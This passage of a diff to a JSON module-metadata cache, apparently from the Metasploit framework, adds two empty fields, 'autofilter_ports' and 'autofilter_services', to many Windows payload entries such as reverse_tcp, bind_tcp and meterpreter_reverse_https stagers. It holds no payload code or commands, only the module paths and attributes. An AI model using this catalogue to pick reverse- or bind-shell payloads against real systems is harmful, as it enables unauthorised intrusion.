"autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", @@ -109891,6 +138560,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", @@ -109922,6 +138593,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-27 19:24:51 +0000", "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", @@ -109953,6 +138626,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", @@ -109985,6 +138660,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp.rb", @@ -110019,6 +138696,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", @@ -110051,6 +138730,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", @@ -110081,6 +138762,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/findtag_ord.rb", @@ -110113,6 +138796,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", @@ -110144,6 +138829,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", @@ -110175,6 +138862,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", @@ -110207,6 +138896,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", @@ -110239,6 +138930,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", @@ -110272,6 +138965,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", @@ -110306,6 +139001,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", @@ -110340,6 +139037,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", @@ -110372,6 +139071,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", @@ -110403,6 +139104,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 14:34:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_udp.rb", @@ -110435,6 +139138,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-19 17:58:45 +0000", "path": "/modules/payloads/singles/windows/powershell_bind_tcp.rb", @@ -110467,6 +139172,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-19 17:58:45 +0000", "path": "/modules/payloads/singles/windows/powershell_reverse_tcp.rb", @@ -110500,6 +139207,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", @@ -110533,6 +139242,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", @@ -110565,6 +139276,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", @@ -110598,6 +139311,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", @@ -110629,6 +139344,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-27 19:24:51 +0000", "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", @@ -110660,6 +139377,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", @@ -110692,6 +139411,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp.rb", @@ -110726,6 +139447,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", @@ -110758,6 +139481,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", @@ -110789,6 +139514,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/findtag_ord.rb", @@ -110821,6 +139548,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", @@ -110852,6 +139581,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", @@ -110882,6 +139613,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", @@ -110914,6 +139647,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", @@ -110946,6 +139681,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", @@ -110979,6 +139716,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", @@ -111013,6 +139752,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", @@ -111047,6 +139788,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", @@ -111079,6 +139822,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", @@ -111110,6 +139855,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 14:34:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_udp.rb", @@ -111140,6 +139887,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/shell_bind_tcp.rb", @@ -111169,6 +139918,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb", @@ -111200,6 +139951,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb", @@ -111230,6 +139983,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/shell_reverse_tcp.rb", @@ -111259,6 +140014,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/speak_pwned.rb", @@ -111292,6 +140049,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", @@ -111325,6 +140084,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", @@ -111357,6 +140118,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", @@ -111390,6 +140153,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", @@ -111421,6 +140186,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-27 19:24:51 +0000", "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", @@ -111451,6 +140218,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", @@ -111483,6 +140252,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp.rb", @@ -111517,6 +140288,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", @@ -111549,6 +140322,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", @@ -111580,6 +140355,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/findtag_ord.rb", @@ -111612,6 +140389,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", @@ -111642,6 +140421,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", @@ -111673,6 +140454,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", @@ -111705,6 +140488,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", @@ -111737,6 +140522,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", @@ -111770,6 +140557,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", @@ -111804,6 +140593,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", @@ -111838,6 +140629,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", @@ -111870,6 +140663,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", @@ -111901,6 +140696,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 14:34:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_udp.rb", @@ -111934,6 +140731,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", @@ -111967,6 +140766,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", @@ -111999,6 +140800,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", @@ -112032,6 +140835,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", @@ -112063,6 +140868,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-27 19:24:51 +0000", "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", @@ -112094,6 +140901,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", @@ -112126,6 +140935,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp.rb", @@ -112160,6 +140971,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", @@ -112192,6 +141005,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", @@ -112223,6 +141038,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/findtag_ord.rb", @@ -112256,6 +141073,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_hop_http.rb", @@ -112287,6 +141106,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_http.rb", @@ -112318,6 +141139,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", @@ -112350,6 +141173,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", @@ -112381,6 +141206,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", @@ -112412,6 +141239,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", @@ -112444,6 +141273,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", @@ -112476,6 +141307,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", @@ -112509,6 +141342,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", @@ -112543,6 +141378,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", @@ -112577,6 +141414,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", @@ -112609,6 +141448,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", @@ -112640,6 +141481,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 14:34:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_udp.rb", @@ -112672,6 +141515,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", @@ -112701,6 +141546,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/x64/exec.rb", @@ -112731,6 +141578,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/x64/loadlibrary.rb", @@ -112763,6 +141612,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", @@ -112795,6 +141646,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", @@ -112828,6 +141681,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", @@ -112860,6 +141715,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", @@ -112892,6 +141749,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", @@ -112924,6 +141783,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-20 11:27:43 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", @@ -112959,6 +141820,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-20 11:27:43 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", @@ -112991,6 +141854,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-01 03:49:00 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb", @@ -113023,6 +141888,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", @@ -113059,6 +141926,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-04 17:43:15 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", @@ -113091,6 +141960,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", @@ -113123,6 +141994,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-20 11:27:43 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb", @@ -113155,6 +142028,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-20 11:27:43 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb", @@ -113187,6 +142062,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb", @@ -113218,6 +142095,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb", @@ -113249,6 +142128,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb", @@ -113280,6 +142161,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb", @@ -113311,6 +142194,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb", @@ -113342,6 +142227,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb", @@ -113373,6 +142260,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-19 17:58:45 +0000", "path": "/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb", @@ -113404,6 +142293,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-19 17:58:45 +0000", "path": "/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb", @@ -113433,6 +142324,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", @@ -113463,6 +142356,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", @@ -113493,6 +142388,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", @@ -113522,6 +142419,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", @@ -113552,6 +142451,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", @@ -113581,6 +142482,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", @@ 